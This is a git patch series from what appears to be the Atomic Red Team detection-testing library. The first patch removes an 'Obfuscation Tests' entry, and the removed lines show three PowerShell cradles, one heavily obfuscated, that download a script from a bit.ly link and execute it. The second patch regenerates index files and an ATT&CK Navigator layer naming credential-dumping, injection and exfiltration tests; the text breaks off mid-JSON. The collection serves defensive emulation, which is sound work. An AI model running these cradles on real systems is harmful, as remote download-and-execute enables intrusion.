From af13a591773c8b2f6c3ceeb5fc62390edbb1bf1f Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 21 Feb 2024 11:25:36 -0500 Subject: [PATCH 01/41] remove atomic w/broken bitly link (#2693) --- atomics/T1059.001/T1059.001.yaml | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index a957c18625..89ee87a182 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -60,18 +60,6 @@ atomic_tests: cleanup_command: | Remove-Item $env:Temp\*BloodHound.zip -Force name: powershell -- name: Obfuscation Tests - auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - description: | - Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - supported_platforms: - - windows - executor: - command: | - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() - Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) - name: powershell - name: Mimikatz - Cradlecraft PsSendKeys auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d description: | From a840cf62458500fb33efe3b150cd78c8b68fbfec Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Wed, 21 Feb 2024 16:26:59 +0000 Subject: [PATCH 02/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 35 +++--- atomics/Indexes/Indexes-CSV/windows-index.csv | 35 +++--- atomics/Indexes/Indexes-Markdown/index.md | 35 +++--- .../Indexes/Indexes-Markdown/windows-index.md | 35 +++--- atomics/Indexes/index.yaml | 15 --- atomics/Indexes/windows-index.yaml | 15 --- atomics/T1059.001/T1059.001.md | 100 ++++++------------ 9 files changed, 104 insertions(+), 170 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 1433899a58..2fbf9f9c01 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":21,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local 